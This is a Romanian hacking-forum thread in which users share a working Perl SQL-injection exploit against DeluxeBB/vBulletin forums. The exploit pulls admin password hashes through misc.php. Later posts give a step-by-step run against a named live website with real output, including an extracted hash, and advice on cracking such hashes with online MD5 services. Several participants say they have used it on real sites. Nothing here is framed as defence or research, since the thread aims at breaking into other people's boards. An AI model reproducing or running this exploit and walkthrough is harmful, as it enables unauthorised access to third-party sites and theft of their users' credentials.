Hacking and more...
HaCkinG CulT 		Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat. 		Nou pe simpatie:
SweetMonique la Simpatie.ro
Femeie
23 ani
Galati
cauta Barbat
28 - 52 ani
Hacking and more... / Hacking-ul nostru cel de toate zilele / video tutorial [vbulletin hacking] by fl0 fl0w Moderat de Shocker
Autor
Mesaj Pagini: 1
vgteam
Grand Master

Inregistrat: acum 18 ani
Postari: 219

flo m-a rugat sa pun aici acest video tutorial facut de el, pentru ca el are ban x(, cu mesajul: "am sa ma intorc si nu am sa vreau sa ma inscriu"

enjoy it

Modificat de vgteam (acum 17 ani)

_______________________________________
HACKPEDIA project
stage: strangerea de fonduri :d
pus acum 17 ani
   
peacebreaker
Senior

Inregistrat: acum 18 ani
Postari: 119
sa ii spui lu flo flow ca face niste tutorialuri foarte foarte bune

_______________________________________
Virusi is usor de facut chestia e sa fie cat mai original

pus acum 17 ani
   
Xtr3M.
elite user

Din: fata monitorului
Inregistrat: acum 17 ani
Postari: 1015
sa-i spui lu flo ca a uitat sa specifice niste amanunte foarte importante cum ar fi /directory/ victim_userid ! in rest nu a facut decat sa foloseasca un exploit, putea la fel de bine sa-l posteze!

_______________________________________
e-mail: xtr3m[at]pscomp[DOT]com
pus acum 17 ani
   
ecko-kill
Junior+

Inregistrat: acum 17 ani
Postari: 30
bine misto tutorial; si ce ar trebuiii sa fak cu parola aia??????????????????
pus acum 17 ani
   
Hooligan
Old School Member

Din: Zion
Inregistrat: acum 18 ani
Postari: 461

ecko-kill a scris:

bine misto tutorial; si ce ar trebuiii sa fak cu parola aia??????????????????

decriptezi hashul si pe urma te loghezi cu userul si parola adminului ... oricum nu inteleg ce iti place daca nu stii despre ce este vorba

_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
pus acum 17 ani
   
hackedss
Elite Member

Inregistrat: acum 17 ani
Postari: 858
cum decriptezi hashul ala ?

_______________________________________
pus acum 17 ani
   
Hooligan
Old School Member

Din: Zion
Inregistrat: acum 18 ani
Postari: 461


_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
pus acum 17 ani
   
hackedss
Elite Member

Inregistrat: acum 17 ani
Postari: 858
si ce tre sa caut eu aici .. ca sa decriptez.. ?

_______________________________________
pus acum 17 ani
   
Hooligan
Old School Member

Din: Zion
Inregistrat: acum 18 ani
Postari: 461
daca nu merge pe milw0rm cauta si tu pe google alte situri care decripteaza md5

_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
pus acum 17 ani
   
hackedss
Elite Member

Inregistrat: acum 17 ani
Postari: 858
pai ce nu zici ca e cryptat cu md5 .... ma da cu hashul ala decripteaza numai un cuvant nu stiu daca intelegi ca sa te loghezi parca trebe ...user and pass..

_______________________________________
pus acum 17 ani
   
hackedss
Elite Member

Inregistrat: acum 17 ani
Postari: 858
pana la urma cum e corect tot cu /directory/ victim_userid ?

_______________________________________
pus acum 17 ani
   
Hooligan
Old School Member

Din: Zion
Inregistrat: acum 18 ani
Postari: 461

hackedss a scris:

pai ce nu zici ca e cryptat cu md5 .... ma da cu hashul ala decripteaza numai un cuvant nu stiu daca intelegi ca sa te loghezi parca trebe ...user and pass..

hashul este parola si te uiti si tu care este userul adminului

_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
pus acum 17 ani
   
hackedss
Elite Member

Inregistrat: acum 17 ani
Postari: 858
ok asta am inteles.. dar cum este corect in fisieru asta ca sa mearga ca imi da si o eraore la linia 47  /directory/ victim_userid ce tre sa fac ? unde modific ?

Code:

#!/usr/bin/perl

use IO::Socket;


print q{
######################################################
#   DeluxeBB  Remote SQL Injection Exploit           #
#   vbulletin Remote SQL Injection Exploit           #
######################################################
};

if (!$ARGV[2]) {

print q{ 
    Usage: perl dbbxpl.pl host /directory/ victim_userid 
  
       perl dbbxpl.pl www.nekisite.com /forum/ 1


};

}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];

print "------------------------------------------------------------------------------------------------rn";
print "[>] SERVER: $serverrn";
print "[>]    DIR: $dirrn";
print "[>] USERID: $userrn";
print "------------------------------------------------------------------------------------------------rnrn";

$server =~ s/(http://)//eg;

$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;

 
print "[~] PREPARE TO CONNECT...rn";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTEDrn";
print "[~] SENDING QUERY...rn";
print $socket "GET $path HTTP/1.1rn";
print $socket "Host: $serverrn";
print $socket "Accept: */*rn";
print $socket "Connection: closernrn";
print "[+] DONE!rnrn";



print "--[ REPORT ]------------------------------------------------------------------------------------rn";
while ($answer = <$socket>)
{

 if ($answer =~/(w{32})/)
{

  if ($1 ne 0) {
   print "Password Hash is: ".$1."rn";
print "--------------------------------------------------------------------------------------rn";

      }
exit();
}

}
print "------------------------------------------------------------------------------------------------rn";



Modificat de hackedss (acum 17 ani)

_______________________________________
pus acum 17 ani
   
h3x
Junior

Inregistrat: acum 17 ani
Postari: 29
i think i'm gonna be sick ... vista????? 

_______________________________________
Information wants to be free
pus acum 17 ani
   
hackedss
Elite Member

Inregistrat: acum 17 ani
Postari: 858
haideti ma care corecteaza exploitu pls

Modificat de hackedss (acum 17 ani)

_______________________________________
pus acum 17 ani
   
Xtr3M.
elite user

Din: fata monitorului
Inregistrat: acum 17 ani
Postari: 1015
esti VAI DE TINE ! ce exploit sa corecteze ma? inlocuiesti in exploit tu, sau dupa ce scrii perl blabla.pl sitecarevreitusa-lspargicica.com pui directorul / si user id ! Got it? urmareste bine tutorialul !

_______________________________________
e-mail: xtr3m[at]pscomp[DOT]com
pus acum 17 ani
   
hackedss
Elite Member

Inregistrat: acum 17 ani
Postari: 858
ma fii oleak mai explicit deci.... scriu perl yep.pl situcarevreauvbulletin.com apoi cum adik sa pun directorul si user id ceva de genu ?
perl yep.pl situcarevreauvbuletin.com/cddesktop/user id sau cum drak nu inteleg....

_______________________________________
pus acum 17 ani
   
vgteam
Grand Master

Inregistrat: acum 18 ani
Postari: 219

hackedss a scris:

ma fii oleak mai explicit deci.... scriu perl yep.pl situcarevreauvbulletin.com apoi cum adik sa pun directorul si user id ceva de genu ?
perl yep.pl situcarevreauvbuletin.com/cddesktop/user id sau cum drak nu inteleg....


esti prost frate, scuza-ma ca iti zic...

_______________________________________
HACKPEDIA project
stage: strangerea de fonduri :d
pus acum 17 ani
   
hackedss
Elite Member

Inregistrat: acum 17 ani
Postari: 858
wa da vb frumos  unde te crezi PE TARLA ?  ce tu tot intelegi stiii tot esti BILD GATE mm   * ( u ai inceputo ) eu v-am rugat ceva sa imi ziceti si voi .. mda

_______________________________________
pus acum 17 ani
   
Crash Override
Helper

Din: HackPedia
Inregistrat: acum 18 ani
Postari: 275

hackedss a scris:

ma fii oleak mai explicit deci.... scriu perl yep.pl situcarevreauvbulletin.com apoi cum adik sa pun directorul si user id ceva de genu ?
perl yep.pl situcarevreauvbuletin.com/cddesktop/user id sau cum drak nu inteleg....

Voi incerca sa iti dau un exemplu din care sper sa intelegi .

Numele exploitului este yep.pl , ai nevoie de active perl pentru a rula exploitul .
Intri in start - run unde vei scrie cmd . (Asta sti , dar sar putea sa aibe altcineva nevoie)

Site-ul pe care iti voi da exemplul este

Bun in cmd vei scrie asa :

Code:

perl yep.pl battsboard.com / 1

Rezultatul va fi :

Code:

C:Perlbin>perl yep.pl battsboard.com / 1

######################################################
#   DeluxeBB  Remote SQL Injection Exploit           #
#   vbulletin Remote SQL Injection Exploit           #
######################################################
--------------------------------------------------------------------------------
----------------
[>] SERVER: battsboard.com
[>]    DIR: /
[>] USERID: 1
--------------------------------------------------------------------------------
----------------

[~] PREPARE TO CONNECT...
[+] CONNECTED
[~] SENDING QUERY...
[+] DONE!

--[ REPORT ]--------------------------------------------------------------------
----------------
Password Hash is: e831d6dd5c18adec75f89b65cdc7ed94
--------------------------------------------------------------------------------

Hashu este : e831d6dd5c18adec75f89b65cdc7ed94
Numara din cate carctere este hashul . [ Iti spun eu : 32 ]
Acest hash este un md5.
Cum facem sa aflam ce parola se afla in spatele acestui hash ?
Intram pe . Aici vei da paste la hash langa dai click pe md5 , iar sus scri acel cod din imagine , si astepti .


Sper ca ai inteles ceva[ceva mai mult]
Astept replay daca nu ai inteles ceva.

Modificat de StreSs (acum 17 ani)

_______________________________________
Hacking.3xForum.Ro - Helper
pus acum 17 ani
   
hackedss
Elite Member

Inregistrat: acum 17 ani
Postari: 858
gg tutorial ... am inteles deci imi merge sa aflu hashul dar sa il decriptez nu asta imi zice ...
Watch the main page for available spots.
or donate for a better spot.

_______________________________________
pus acum 17 ani
   
Crash Override
Helper

Din: HackPedia
Inregistrat: acum 18 ani
Postari: 275

hackedss a scris:

gg tutorial ... am inteles deci imi merge sa aflu hashul dar sa il decriptez nu asta imi zice ...
Watch the main page for available spots.
or donate for a better spot.

Incearca alt md5 crack .

_______________________________________
Hacking.3xForum.Ro - Helper
pus acum 17 ani
   
Asgard
Master of 127.0.0.1

Inregistrat: acum 17 ani
Postari: 161
am incercat mai multe siteuri de decript dar nu merge nici unul! Aveti vreo idee?

_______________________________________
pus acum 17 ani
   
flo_flow
Vizitator
Ba tu stii ce e aia un hash saltat ? NU AI CUM SA-L DECRIPTEZI.
pus acum 17 ani
   
Asgard
Master of 127.0.0.1

Inregistrat: acum 17 ani
Postari: 161
Pai si cu ce ma ajuta daca am descoperit hashul ala? Am intrebat nu am dat cu paru! Macar explica!

_______________________________________
pus acum 17 ani
   
flo_flow
Vizitator
Pentru a sublinia vulnerabilitatea ,si exploitul este important.
pus acum 17 ani
   
DogPound
Little Kevin

Din: Room
Inregistrat: acum 18 ani
Postari: 85
Multumesc flo_flow chiar functioneaza    Deja am extras 2 md5-uri si le-am dat la decryptat...multumesc mult pentru ajutor 

pus acum 17 ani
   
Asgard
Master of 127.0.0.1

Inregistrat: acum 17 ani
Postari: 161
poti sa imi zici si mie siteul te rog?

_______________________________________
pus acum 17 ani
   
DogPound
Little Kevin

Din: Room
Inregistrat: acum 18 ani
Postari: 85
din pacate ambele decryptari au esuat , nu-i nimic mai incerc

pt Asgard: site-ul 

pt ceilalti in caz ca va trebuie :  Active Perl Have fun! 

Le: totusi , nu e asa de bun , am incercat 3 md5-uri si nu a reusit sa imi decripteze nici unul..Va rog frumos , alte idei aveti? Va multumesc!

Modificat de DogPound (acum 17 ani)
pus acum 17 ani
   
flo_flow
Vizitator
Ma sunt saltate hash'urile de pe vbulletin ,de cate ori sa zic.E bine de exersat.
pus acum 17 ani
   
DogPound
Little Kevin

Din: Room
Inregistrat: acum 18 ani
Postari: 85

flo_flow a scris:

Ma sunt saltate hash'urile de pe vbulletin ,de cate ori sa zic.E bine de exersat.


Bun , am inteles , ai creeat un exploit si ai vrut sa ni-l dai si noua sa il testam sa vedem cum merge...Merge perfect!!! Cand te vei decide sa ne impartasesti si cum se face sa gasesti un hash nesaltat md5 pe care sa il pot decrypta atunci am sa pot spune si eu cu mandrie ca am avut un profesor de nota 10 ( nu ca nu as avea )    Respect , flo_flow!   

pus acum 17 ani
   
Pagini: 1  

Mergi la